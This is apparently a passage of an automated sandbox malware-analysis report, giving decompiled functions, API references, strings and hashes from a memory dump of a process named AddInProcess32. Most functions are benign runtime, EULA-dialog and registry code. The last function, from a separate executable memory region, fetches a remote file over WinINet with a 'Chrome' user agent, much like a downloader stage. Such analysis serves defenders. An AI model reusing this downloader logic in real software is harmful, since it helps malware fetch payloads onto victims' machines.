						_t42 = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00405700(0x314, _t35, _t37, _t38);
						_t49 = _t49 + 0x14;
						L17:
						_t18 = E0040A4E5(_t37, 0x414548, 0x314, "\n\n");
						_t50 = _t49 + 0xc;
						if(_t18 != 0) {
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							E00405700(0x314, _t35, _t37, _t38);
							_t50 = _t50 + 0x14;
						}
						_t19 = E0040A4E5(_t37, 0x414548, 0x314,  *(0x4138d4 + _t38 * 8));
						_t51 = _t50 + 0xc;
						if(_t19 != 0) {
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							E00405700(0x314, _t35, _t37, _t38);
							_t51 = _t51 + 0x14;
						}
						_t11 = E0040AF20(_t37, 0x414548, "Microsoft Visual C++ Runtime Library", 0x12010);
						goto L25;
					}
				} else {
					goto L22;
				}
			}

0x00406ce5
0x00406ce7
0x00406cef
0x00406cf1
0x00406cfa
0x00406cfe
0x00000000
0x00000000
0x00000000
0x00406cfe
0x00406d03
0x00406e84
0x00406e84
0x00406d15
0x00406e4c
0x00406e4e
0x00406e54
0x00406e58
0x00406e66
0x00406e79
0x00406e79
0x00406e7f
0x00000000
0x00406e7f
0x00406d1d
0x00406d24
0x00406d25
0x00406d3a
0x00000000
0x00000000
0x00406d51
0x00406d56
0x00406d5b
0x00406d5d
0x00406d5e
0x00406d5f
0x00406d60
0x00406d61
0x00406d62
0x00406d67
0x00406d67
0x00406d77
0x00406d86
0x00406d93
0x00406d98
0x00406d9d
0x00406da1
0x00406da2
0x00406da3
0x00406da4
0x00406da5
0x00406da6
0x00406dab
0x00406dab
0x00406d9d
0x00406daf
0x00406db8
0x00406db9
0x00406df3
0x00406df3
0x00000000
0x00406dbb
0x00406dc4
0x00406dd2
0x00406dd6
0x00406ddb
0x00406de0
0x00000000
0x00000000
0x00406de2
0x00406de4
0x00406de5
0x00406de6
0x00406de7
0x00406de8
0x00406de9
0x00406dee
0x00406df5
0x00406dfc
0x00406e01
0x00406e06
0x00406e08
0x00406e09
0x00406e0a
0x00406e0b
0x00406e0c
0x00406e0d
0x00406e12
0x00406e12
0x00406e1e
0x00406e23
0x00406e28
0x00406e2a
0x00406e2b
0x00406e2c
0x00406e2d
0x00406e2e
0x00406e2f
0x00406e34
0x00406e34
0x00406e42
0x00000000
0x00406e47
0x00000000
0x00000000
0x00000000

APIs

_strcpy_s.LIBCMT ref: 00406D51
__invoke_watson.LIBCMT ref: 00406D62
GetModuleFileNameA.KERNEL32(00000000,00414561,00000104), ref: 00406D7E
_strcpy_s.LIBCMT ref: 00406D93
__invoke_watson.LIBCMT ref: 00406DA6
_strlen.LIBCMT ref: 00406DAF
_strlen.LIBCMT ref: 00406DBC
__invoke_watson.LIBCMT ref: 00406DE9
_strcat_s.LIBCMT ref: 00406DFC
__invoke_watson.LIBCMT ref: 00406E0D
_strcat_s.LIBCMT ref: 00406E1E
__invoke_watson.LIBCMT ref: 00406E2F
GetStdHandle.KERNEL32(000000F4,?,?,00000000,77D44620,00000003,00406EB1,000000FC,00403572,?,?,00000000,?,00401E38,00000000,?), ref: 00406E4E
_strlen.LIBCMT ref: 00406E6F
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00401E38,00000000,?,?), ref: 00406E79

Strings

<program name unknown>, xrefs: 00406D88
..., xrefs: 00406DCD
Runtime Error!Program: , xrefs: 00406D40
\HA, xrefs: 00406DC8
aEA, xrefs: 00406D6F
Microsoft Visual C++ Runtime Library, xrefs: 00406E3C
HEA, xrefs: 00406D4B

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
String ID: ...$<program name unknown>$HEA$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $\HA$aEA
API String ID: 1879448924-3572076021
Opcode ID: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
Instruction ID: b7283139e289806ab696c21597f2b912ea31a9b8ad5217b72df3c15dadb4aa87
Opcode Fuzzy Hash: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
Instruction Fuzzy Hash: 133118B6A003116AE6203375DC0AF6B364D9B61759F16013BFD4AB12C3EE7D892581FE

Uniqueness

Uniqueness Score: -1.00%

Function 00401470 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 242
registrymemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401470(char _a4) {
				int _v0;
				signed int _v4;
				short _v524;
				int _v528;
				void* _v532;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t76;
				signed int _t85;
				signed short* _t88;
				signed short* _t89;
				signed int _t91;
				short* _t92;
				short* _t93;
				void* _t94;
				signed int _t97;
				short* _t98;
				short* _t99;
				void* _t100;
				signed int _t103;
				short* _t104;
				short* _t105;
				void* _t106;
				signed int _t109;
				short* _t110;
				short* _t111;
				void* _t112;
				signed int _t115;
				signed short* _t116;
				signed short* _t117;
				void* _t122;
				signed int _t128;
				signed int _t129;
				signed short* _t130;
				signed short* _t132;
				signed short* _t133;
				signed short* _t134;
				void* _t136;
				signed int _t137;
				void* _t142;
				void* _t144;
				void* _t146;
				void* _t148;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t154;
				int* _t157;
				int* _t158;
				int* _t159;
				int* _t160;
				int* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				void* _t168;
				void* _t170;
				void* _t171;
				int _t173;
				signed int _t177;
				signed int _t178;

				_t177 =  &_v532;
				_t76 =  *0x413004; // 0x98fc836b
				_v4 = _t76 ^ _t177;
				_t173 = 0;
				_v532 = 0;
				E00403227( &_v524,  &_v524, L"Software\\Sysinternals\\%s", L"ShellRunas - Sysinternals: www.sysinternals.com");
				_t178 = _t177 + 0xc;
				if(RegCreateKeyW(0x80000001,  &_v524,  &_v532) == 0) {
					_v528 = 4;
					RegQueryValueExW(_v532, L"EulaAccepted", 0, 0,  &_a4,  &_v528);
				}
				if(_a4 != _t173) {
					L20:
					RegSetValueExW(_v532, L"EulaAccepted", _t173, 4,  &_a4, 4);
				} else {
					_push(_t170);
					_t171 = LocalAlloc(0x40, 0x3e8);
					_t11 = _t171 + 0x12; // 0x12
					_t157 = _t11;
					LoadLibraryW(L"Riched32.dll");
					 *_t171 = 0x80c808d0;
					 *(_t171 + 0xa) = _t173;
					 *(_t171 + 0xc) = _t173;
					 *((short*)(_t171 + 0xe)) = 0x138;
					 *((short*)(_t171 + 0x10)) = 0xb4;
					 *(_t171 + 8) = _t173;
					 *_t157 = _t173;
					_t158 =  &(_t157[0]);
					 *_t158 = _t173;
					_t159 =  &(_t158[0]);
					_t88 = L"License Agreement";
					_t142 = _t159 - _t88;
					do {
						_t128 =  *_t88 & 0x0000ffff;
						 *(_t142 + _t88) = _t128;
						_t88 =  &(_t88[1]);
					} while (_t128 != _t173);
					_t160 =  &(_t159[9]);
					 *_t160 = 8;
					_t161 =  &(_t160[0]);
					_t89 = L"MS Shell Dlg";
					_t144 = _t161 - _t89;
					do {
						_t129 =  *_t89 & 0x0000ffff;
						 *(_t144 + _t89) = _t129;
						_t89 =  &(_t89[1]);
					} while (_t129 != _t173);
					_t19 =  &(_t161[7]); // 0x5
					_t91 = _t19 & 0xfffffffc;
					 *((short*)(_t91 + 8)) = 7;
					 *((short*)(_t91 + 0xa)) = 3;
					 *((short*)(_t91 + 0xc)) = 0x12a;
					 *((short*)(_t91 + 0x10)) = 0x1f6;
					 *_t91 = 0x50000000;
					_push(_t122);
					 *((short*)(_t91 + 0xe)) = 0xe;
					_t92 = _t91 + 0x12;
					 *_t92 = 0xffff;
					_t93 = _t92 + 2;
					 *_t93 = 0x82;
					_t94 = _t93 + 2;
					_t130 = L"You can also use the /accepteula command-line switch to accept the EULA.";
					_t146 = _t94 - _t130;
					do {
						_t162 =  *_t130 & 0x0000ffff;
						 *(_t146 + _t130) = _t162;
						_t130 =  &(_t130[1]);
					} while (_t162 != _t173);
					 *(_t94 + 0x92) = _t173;
					_t97 = _t94 + 0x97 & 0xfffffffc;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					 *((short*)(_t97 + 0x10)) = 1;
					 *((short*)(_t97 + 8)) = 0xc9;
					 *((short*)(_t97 + 0xa)) = 0x9f;
					 *((short*)(_t97 + 0xe)) = 0xe;
					 *_t97 = 0x50010000;
					 *((short*)(_t97 + 0xc)) = 0x32;
					_t98 = _t97 + 0x12;
					 *_t98 = 0xffff;
					_t99 = _t98 + 2;
					 *_t99 = 0x80;
					_t100 = _t99 + 2;
					_t132 = L"&Agree";
					_t148 = _t100 - _t132;
					do {
						_t163 =  *_t132 & 0x0000ffff;
						 *(_t148 + _t132) = _t163;
						_t132 =  &(_t132[1]);
					} while (_t163 != 0);
					 *(_t100 + 0xe) = _t163;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_t103 = _t100 + 0x13 & 0xfffffffc;
					 *((short*)(_t103 + 8)) = 0xff;
					 *((short*)(_t103 + 0xa)) = 0x9f;
					 *((short*)(_t103 + 0xc)) = 0x32;
					 *((short*)(_t103 + 0xe)) = 0xe;
					 *((short*)(_t103 + 0x10)) = 2;
					 *_t103 = 0x50010000;
					_t104 = _t103 + 0x12;
					 *_t104 = 0xffff;
					_t105 = _t104 + 2;
					 *_t105 = 0x80;
					_t106 = _t105 + 2;
					_t133 = L"&Decline";
					_t150 = _t106 - _t133;
					do {
						_t164 =  *_t133 & 0x0000ffff;
						 *(_t150 + _t133) = _t164;
						_t133 =  &(_t133[1]);
					} while (_t164 != 0);
					 *(_t106 + 0x12) = _t164;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_t109 = _t106 + 0x17 & 0xfffffffc;
					 *((short*)(_t109 + 8)) = 7;
					 *((short*)(_t109 + 0xa)) = 0x9f;
					 *((short*)(_t109 + 0xc)) = 0x32;
					 *((short*)(_t109 + 0xe)) = 0xe;
					 *((short*)(_t109 + 0x10)) = 0x1f5;
					 *_t109 = 0x50010000;
					_t110 = _t109 + 0x12;
					 *_t110 = 0xffff;
					_t111 = _t110 + 2;
					 *_t111 = 0x80;
					_t112 = _t111 + 2;
					_t134 = L"&Print";
					_t152 = _t112 - _t134;
					do {
						_t165 =  *_t134 & 0x0000ffff;
						 *(_t152 + _t134) = _t165;
						_t134 =  &(_t134[1]);
					} while (_t165 != 0);
					 *(_t112 + 0xe) = _t165;
					_t115 = _t112 + 0x13 & 0xfffffffc;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_t56 = _t115 + 0x12; // -249
					_t153 = _t56;
					 *((short*)(_t115 + 0xa)) = 0xe;
					 *((short*)(_t115 + 8)) = 7;
					 *((short*)(_t115 + 0xc)) = 0x12a;
					 *((short*)(_t115 + 0xe)) = 0x8c;
					 *((short*)(_t115 + 0x10)) = 0x1f4;
					 *_t115 = 0x50a11844;
					_t116 = L"RICHEDIT";
					_t136 = _t153 - _t116;
					_pop(_t122);
					do {
						_t166 =  *_t116 & 0x0000ffff;
						 *(_t136 + _t116) = _t166;
						_t116 =  &(_t116[1]);
					} while (_t166 != 0);
					_t154 = _t153 + 0x12;
					_t117 = L"&Decline";
					_t168 = _t154 - _t117;
					do {
						_t137 =  *_t117 & 0x0000ffff;
						 *(_t168 + _t117) = _t137;
						_t117 =  &(_t117[1]);
					} while (_t137 != 0);
					 *(_t154 + 0x12) = _t137;
					 *(_t171 + 8) =  *(_t171 + 8) + 1;
					_v0 = DialogBoxIndirectParamW(0, _t171, 0, E00401310, L"ShellRunas - Sysinternals: www.sysinternals.com");
					LocalFree(_t171);
					_t173 = 0;
					_pop(_t170);
					if(_v0 != 0) {
						goto L20;
					}
				}
				RegCloseKey(_v532);
				_t85 = 0 | _a4 != _t173;
				E0040318A(_t85, _t122, _v4 ^ _t178, _t170);
				return _t85;
			}

0x00401470
0x00401476
0x0040147d
0x00401493
0x00401496
0x0040149a
0x0040149f
0x004014b9
0x004014d4
0x004014dc
0x004014dc
0x004014e9
0x004017a7
0x004017be
0x004014ef
0x004014ef
0x004014fe
0x00401505
0x00401505
0x00401508
0x0040150e
0x00401514
0x00401518
0x0040151c
0x00401522
0x00401528
0x0040152c
0x0040152f
0x00401532
0x00401535
0x00401538
0x0040153f
0x00401541
0x00401541
0x00401544
0x00401548
0x0040154b
0x00401550
0x00401553
0x00401558
0x0040155b
0x00401562
0x00401564
0x00401564
0x00401567
0x0040156b
0x0040156e
0x00401573
0x00401576
0x00401579
0x0040157f
0x00401585
0x0040158b
0x00401591
0x00401597
0x0040159d
0x004015a1
0x004015a4
0x004015a9
0x004015ac
0x004015b1
0x004015b4
0x004015bb
0x004015c0
0x004015c0
0x004015c3
0x004015c7
0x004015ca
0x004015cf
0x004015de
0x004015e6
0x004015ea
0x004015ee
0x004015f4
0x004015fa
0x004015fe
0x00401609
0x0040160d
0x00401610
0x00401615
0x00401618
0x0040161d
0x00401620
0x00401627
0x00401630
0x00401630
0x00401633
0x00401637
0x0040163a
0x0040163f
0x00401643
0x0040164d
0x00401650
0x00401656
0x0040165c
0x00401660
0x00401664
0x0040166a
0x00401670
0x00401673
0x00401678
0x0040167b
0x00401680
0x00401683
0x0040168a
0x00401690
0x00401690
0x00401693
0x00401697
0x0040169a
0x0040169f
0x004016a3
0x004016ae
0x004016b1
0x004016b7
0x004016bd
0x004016c1
0x004016c5
0x004016cb
0x004016d1
0x004016d4
0x004016d9
0x004016dc
0x004016e1
0x004016e4
0x004016eb
0x004016f0
0x004016f0
0x004016f3
0x004016f7
0x004016fa
0x004016ff
0x00401708
0x00401710
0x00401714
0x00401714
0x00401717
0x0040171b
0x00401721
0x00401727
0x0040172d
0x00401733
0x00401739
0x00401740
0x00401742
0x00401743
0x00401743
0x00401746
0x0040174a
0x0040174d
0x00401752
0x00401755
0x0040175c
0x00401760
0x00401760
0x00401763
0x00401767
0x0040176a
0x0040177c
0x00401780
0x0040178d
0x00401794
0x0040179a
0x004017a4
0x004017a5
0x00000000
0x00000000
0x004017a5
0x004017c9
0x004017e0
0x004017e5
0x004017f0

APIs

__swprintf.LIBCMT ref: 0040149A
RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 004014B1
RegQueryValueExW.ADVAPI32 ref: 004014DC
LocalAlloc.KERNEL32(00000040,000003E8,?,?,?,?,00000000), ref: 004014F8
LoadLibraryW.KERNEL32(Riched32.dll,?,?,?,00000000), ref: 00401508
DialogBoxIndirectParamW.USER32 ref: 00401786
LocalFree.KERNEL32(00000000,?,?,?,00000000), ref: 00401794
RegSetValueExW.ADVAPI32(?,EulaAccepted,00000000,00000004,?,00000004,?,?,00000000), ref: 004017BE
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004017C9

Strings

EulaAccepted, xrefs: 004014CE, 004017B8
Riched32.dll, xrefs: 00401500
&Print, xrefs: 004016E4
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 00401485, 0040176F
&Agree, xrefs: 00401620
License Agreement, xrefs: 00401538
MS Shell Dlg, xrefs: 0040155B
Software\Sysinternals\%s, xrefs: 0040148E
You can also use the /accepteula command-line switch to accept the EULA., xrefs: 004015B4
RICHEDIT, xrefs: 00401739
&Decline, xrefs: 00401683, 00401755

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: LocalValue$AllocCloseCreateDialogFreeIndirectLibraryLoadParamQuery__swprintf
String ID: &Agree$&Decline$&Print$EulaAccepted$License Agreement$MS Shell Dlg$RICHEDIT$Riched32.dll$ShellRunas - Sysinternals: www.sysinternals.com$Software\Sysinternals\%s$You can also use the /accepteula command-line switch to accept the EULA.
API String ID: 1839599301-707968945
Opcode ID: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
Instruction ID: 154b2d0257e82f6b0cd4e7c6326ce2309e60fd29fcbd71df3831e51aaf4186b5
Opcode Fuzzy Hash: f4e69aa77bff61b704e8fbccd0d93f2c3052f5bef0e29b2b67b4d8038d72d3e8
Instruction Fuzzy Hash: C7919CB29603008BC3218F24C81AB92B3B0FF95314F5A955DE5899F3B2F7B8C585C75A

Uniqueness

Uniqueness Score: -1.00%

Function 004019F0 Relevance: 35.2, APIs: 13, Strings: 7, Instructions: 153
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004019F0(void* __ebx, short* __ecx, short* _a4) {
				signed int _v4;
				short _v1044;
				short _v1564;
				void* _v1568;
				void* _v1572;
				void* _v1576;
				void* _v1580;
				void* _v1584;
				void* __esi;
				void* __ebp;
				signed int _t28;
				int _t31;
				short* _t37;
				int* _t38;
				struct HINSTANCE__* _t42;
				intOrPtr* _t47;
				void* _t54;
				intOrPtr _t63;
				void* _t74;
				short* _t80;
				void* _t81;
				int _t82;
				signed int _t86;

				_t54 = __ebx;
				_t86 =  &_v1584;
				_t28 =  *0x413004; // 0x98fc836b
				_v4 = _t28 ^ _t86;
				_t80 = __ecx;
				_t31 = RegCreateKeyExW(0x80000001, _a4, 0, 0, 0, 4, 0,  &_v1576, 0);
				if(_t31 == 0) {
					_t82 = RegCreateKeyExW(_v1576, _t80, _t31, _t31, _t31, 4, _t31,  &_v1584, _t31);
					if(_t82 == 0) {
						_t82 = RegCreateKeyExW(_v1584, L"Shell", 0, 0, 0, 4, 0,  &_v1572, 0);
						if(_t82 == 0) {
							_t37 = L"Run as different user (netonly)...";
							if(__ebx == 0) {
								_t37 = L"Run as different user...";
							}
							_t38 = RegCreateKeyExW(_v1572, _t37, 0, 0, 0, 4, 0,  &_v1568, 0);
							_t82 = _t38;
							if(_t82 == 0) {
								_t42 = RegCreateKeyExW(_v1568, L"Command", _t82, _t82, _t82, 6, _t82,  &_v1580, _t38);
								_t82 = _t42;
								if(_t82 == 0) {
									GetModuleFileNameW(_t42,  &_v1564, 0x104);
									if(_t54 == 0) {
										_push( &_v1564);
										_push(L"\"%s\" \"%%1\" %%*");
										_push(0x208);
										_push( &_v1044);
									} else {
										_push( &_v1564);
										_push(L"\"%s\" /netonly \"%%1\" %%*");
										_push(0x208);
										_push( &_v1044);
									}
									E004032BD();
									_t47 =  &_v1044;
									_t86 = _t86 + 0x10;
									_t74 = _t47 + 2;
									do {
										_t63 =  *_t47;
										_t47 = _t47 + 2;
									} while (_t63 != 0);
									_t82 = RegSetValueW(_v1580, 0, 1,  &_v1044, (_t47 - _t74 >> 1) + (_t47 - _t74 >> 1));
									RegCloseKey(_v1580);
								}
								RegCloseKey(_v1568);
							}
							RegCloseKey(_v1572);
						}
						RegCloseKey(_v1584);
					}
					RegCloseKey(_v1576);
					_t31 = _t82;
				}
				_pop(_t81);
				E0040318A(_t31, _t54, _v4 ^ _t86, _t81);
				return _t31;
			}

0x004019f0
0x004019f0
0x004019f6
0x004019fd
0x00401a15
0x00401a2c
0x00401a30
0x00401a51
0x00401a55
0x00401a78
0x00401a7c
0x00401a84
0x00401a89
0x00401a8b
0x00401a8b
0x00401aa7
0x00401aa9
0x00401aad
0x00401ac9
0x00401acb
0x00401acf
0x00401ae0
0x00401ae8
0x00401b07
0x00401b08
0x00401b0d
0x00401b19
0x00401aea
0x00401aee
0x00401aef
0x00401af4
0x00401b00
0x00401b00
0x00401b1a
0x00401b1f
0x00401b26
0x00401b29
0x00401b30
0x00401b30
0x00401b33
0x00401b36
0x00401b5f
0x00401b61
0x00401b61
0x00401b68
0x00401b68
0x00401b6f
0x00401b6f
0x00401b76
0x00401b76
0x00401b7d
0x00401b7f
0x00401b81
0x00401b8a
0x00401b8d
0x00401b98

APIs

RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000004,00000000,?,00000000,?), ref: 00401A2C
RegCreateKeyExW.ADVAPI32(?,.exe,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A49
RegCreateKeyExW.ADVAPI32(?,Shell,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401A76
RegCreateKeyExW.ADVAPI32(?,Run as different user (netonly)...,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00401AA7
RegCreateKeyExW.ADVAPI32(?,Command,00000000,00000000,00000000,00000006,00000000,?,00000000), ref: 00401AC9
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00401AE0
_swprintf.LIBCMT ref: 00401B1A
RegSetValueW.ADVAPI32(?,00000000,00000001,?), ref: 00401B54
RegCloseKey.ADVAPI32(?), ref: 00401B61
RegCloseKey.ADVAPI32(?), ref: 00401B68
RegCloseKey.ADVAPI32(?), ref: 00401B6F
RegCloseKey.ADVAPI32(?), ref: 00401B76
RegCloseKey.ADVAPI32(?), ref: 00401B7D

Strings

Shell, xrefs: 00401A70
"%s" "%%1" %%*, xrefs: 00401B08
.exe, xrefs: 00401A47
Run as different user (netonly)..., xrefs: 00401A84
"%s" /netonly "%%1" %%*, xrefs: 00401AEF
Run as different user..., xrefs: 00401A8B, 00401AA5
Command, xrefs: 00401AC3

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: CloseCreate$FileModuleNameValue_swprintf
String ID: "%s" "%%1" %%*$"%s" /netonly "%%1" %%*$.exe$Command$Run as different user (netonly)...$Run as different user...$Shell
API String ID: 2816765105-3583415818
Opcode ID: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
Instruction ID: 96684db5b3ddf41ef19364bd1cce9cce62b50f6402ace901a6fc09d749ff9c79
Opcode Fuzzy Hash: fd094dcd363d27c0bf250ac2475080b10ccc28c413ec764f82221b39573ebeb1
Instruction Fuzzy Hash: 6A416E726443017BE320DB64CC46FABB7ACABC8B54F40491DB744AB2D0DAB4F90487A9

Uniqueness

Uniqueness Score: -1.00%

Function 02B51E51 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 205
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E02B51E51(void* __ebx, WCHAR* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				short _v136;
				short _v392;
				short _v648;
				short _v1160;
				short _v5328;
				char _v9496;
				long _v9500;
				void* _v9504;
				long _v9508;
				void _v9512;
				long _v9516;
				long _v9520;
				intOrPtr _v9532;
				WCHAR* _v9536;
				intOrPtr _v9540;
				WCHAR* _v9544;
				intOrPtr _v9548;
				WCHAR* _v9552;
				short _v9556;
				intOrPtr _v9560;
				WCHAR* _v9564;
				intOrPtr _v9568;
				void* _v9580;
				signed int _t63;
				void* _t73;
				void* _t74;
				void* _t81;
				LPCWSTR* _t86;
				long _t100;
				intOrPtr* _t106;
				intOrPtr _t112;
				WCHAR* _t119;
				WCHAR* _t123;
				void* _t125;
				void* _t127;
				void* _t130;
				WCHAR* _t132;
				signed int _t136;

				E02B53F00();
				_t63 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t63 ^ _t136;
				_t106 = _a4;
				_t132 = __ecx;
				_v9504 = __edx;
				_t125 = 0x3c;
				_v1160 = 0;
				_v648 = 0;
				_v392 = 0;
				_v9496 = 0;
				_v5328 = 0;
				E02B52CE7(0,  &_v9580, _t125);
				_v9580 = _t125;
				_v9564 =  &_v1160;
				_v9552 =  &_v648;
				_v9544 =  &_v392;
				_t17 = _t125 + 0x44; // 0x80
				_t112 = _t17;
				_v9548 = _t112;
				_v9536 =  &_v9496;
				_v9540 = _t112;
				_v9560 = 0x100;
				_v9532 = 0x824;
				_v9520 = 0;
				_v9516 = 0;
				if(InternetCrackUrlW(_t132, 0, 0,  &_v9580) == 0 || _v9568 != 3 && _v9568 != 4) {
					_t133 = 0;
					goto L15;
				} else {
					_t129 =  ==  ? 0x80803000 : 0x80000000;
					_t133 = 0;
					_v9508 =  ==  ? 0x80803000 : 0x80000000;
					_t81 = InternetOpenW(L"Chrome", 0, 0, 0, 0);
					_v9520 = _t81;
					if(_t81 == 0) {
						L15:
						_t127 = _v9504;
					} else {
						_t130 = InternetConnectW(_t81,  &_v1160, _v9556,  &_v648,  &_v392, 3, 0, 0);
						_v9516 = _t130;
						if(_t130 == 0) {
							goto L15;
						} else {
							_t119 =  &_v5328;
							_t123 = _v9536;
							if(_v9532 == 0) {
								_t123 = "/";
							}
							E02B52C9C(_t119, _t123);
							_t86 = E02B514D8(HttpOpenRequestW(_t130, L"HEAD",  &_v5328, L"HTTP/1.1", 0x2b542bc, _t133, _v9508, _t133));
							_t133 = _t86;
							if(_t86 == 0) {
								goto L15;
							} else {
								_t127 = HttpOpenRequestW(_t130, L"GET",  &_v5328, L"HTTP/1.1", 0x2b542bc, 0, _v9508, 0);
								_v9512 = 0x2bf20;
								InternetSetOptionW(_t127, 5,  &_v9512, 4);
								InternetSetOptionW(_t127, 6,  &_v9512, 4);
								_t133 = 0;
								wsprintfW( &_v136, L"RANGE:bytes=%d-%d\r\n\r\n", 0, 0x200000);
								if(HttpAddRequestHeadersW(_t127,  &_v136, 0xffffffff, 0xa0000000) != 0 && E02B514D8(_t127) != 0) {
									 *_t106 = 0;
									_v9500 = 0;
									_t133 = InternetReadFile(_t127, _v9504, 0x200000,  &_v9500);
									_t100 = _v9500;
									while(1) {
										 *_t106 =  *_t106 + _t100;
										_v9500 = _v9500 & 0x00000000;
										if(InternetReadFile(_t127,  *_t106 + _v9504, 0x200000,  &_v9500) == 0) {
											break;
										}
										_t100 = _v9500;
										if(_t100 != 0) {
											continue;
										}
										goto L16;
									}
								}
							}
						}
					}
				}
				L16:
				if(_t127 != 0) {
					InternetCloseHandle(_t127);
				}
				_t73 = _v9516;
				if(_t73 != 0) {
					InternetCloseHandle(_t73);
				}
				_t74 = _v9520;
				if(_t74 != 0) {
					InternetCloseHandle(_t74);
				}
				return E02B53C33(_v8 ^ _t136);
			}

0x02b51e59
0x02b51e5e
0x02b51e65
0x02b51e69
0x02b51e72
0x02b51e74
0x02b51e7a
0x02b51e82
0x02b51e89
0x02b51e90
0x02b51e97
0x02b51e9e
0x02b51ea5
0x02b51eb0
0x02b51eb6
0x02b51ec2
0x02b51ecf
0x02b51ed5
0x02b51ed5
0x02b51ede
0x02b51ee4
0x02b51ef5
0x02b51efd
0x02b51f0b
0x02b51f15
0x02b51f1b
0x02b51f29
0x02b520f9
0x00000000
0x02b51f45
0x02b51f51
0x02b51f54
0x02b51f5f
0x02b51f65
0x02b51f6b
0x02b51f73
0x02b520fb
0x02b520fb
0x02b51f79
0x02b51f9f
0x02b51fa1
0x02b51fa9
0x00000000
0x02b51faf
0x02b51faf
0x02b51fb5
0x02b51fc1
0x02b51fc3
0x02b51fc3
0x02b51fc8
0x02b51ff4
0x02b51ff9
0x02b51ffd
0x00000000
0x02b52003
0x02b52030
0x02b5203a
0x02b52048
0x02b52056
0x02b5205d
0x02b5206c
0x02b5208c
0x02b5209f
0x02b520ad
0x02b520ba
0x02b520bc
0x02b520ce
0x02b520ce
0x02b520d6
0x02b520f5
0x00000000
0x00000000
0x02b520c4
0x02b520cc
0x00000000
0x00000000
0x00000000
0x02b520cc
0x02b520f7
0x02b5208c
0x02b51ffd
0x02b51fa9
0x02b51f73
0x02b52101
0x02b52109
0x02b5210c
0x02b5210c
0x02b5210e
0x02b52116
0x02b52119
0x02b52119
0x02b5211b
0x02b52123
0x02b52126
0x02b52126
0x02b5213a

APIs

InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 02B51F21
InternetOpenW.WININET(Chrome,00000000,00000000,00000000,00000000), ref: 02B51F65
InternetConnectW.WININET(00000000,?,?,?,?,00000003,00000000,00000000), ref: 02B51F99
HttpOpenRequestW.WININET(00000000,HEAD,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51FEC
HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B52024
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02B52048
InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B52056
wsprintfW.USER32 ref: 02B5206C
HttpAddRequestHeadersW.WININET(00000000,?,000000FF,A0000000), ref: 02B52084
InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520B4
InternetReadFile.WININET(00000000,?,00200000,?), ref: 02B520ED
InternetCloseHandle.WININET(?), ref: 02B5210C
InternetCloseHandle.WININET(?), ref: 02B52119
InternetCloseHandle.WININET(?), ref: 02B52126

Strings

Chrome, xrefs: 02B51F5A
HEAD, xrefs: 02B51FE6
HTTP/1.1, xrefs: 02B51FE0, 02B52018
GET, xrefs: 02B5201E
RANGE:bytes=%d-%d, xrefs: 02B52066

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
